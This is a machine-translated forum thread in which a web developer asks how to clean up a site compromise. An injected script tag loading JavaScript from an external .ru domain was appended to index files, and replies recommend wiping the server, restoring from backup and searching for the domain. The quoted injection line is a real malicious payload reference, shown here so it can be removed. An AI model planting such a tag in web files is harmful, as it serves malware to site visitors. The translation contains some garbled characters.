我做了最多的web开发工作的计算机发现了病毒。 我目前正在从事的一个网站遭到了破坏(我认为通过phpDesigners存储的FTP密码)。
我目前得到:
<script type =“text / javascript”src =“http://obscurewax.ru/Queue.js”> </ script>
<! – [一些随机数,这里] – >
正好在每个文件的结尾,该文件的名称以该域上的索引开头。
目前我正在通过名称索引(和其他随机)在服务器上对每个文件进行梳理,并将其删除,但是这是一个漫长的过程,我不确定这是否正确/完整。
处理这种情况的最好方法是什么?
(PC上的病毒已被清除)
与任何受损系统一样,最好的行动方式是擦除它并从已知的良好备份恢复。
正如ChrisS所说,如果可能的话,擦拭和恢复。 如果你错了(黑客不想闯入个人网站,他们一般都是这样做的),他们会一次又一次地用相同的方法。 Rackspace托pipe也有一些处理网站妥协的build议 。
大多数文本编辑器(我使用NotePad ++)将在一组文件中find一个string。 我试着将编辑器指向源代码目录的根目录,并findobsurewax.ru来查看有多less个文件。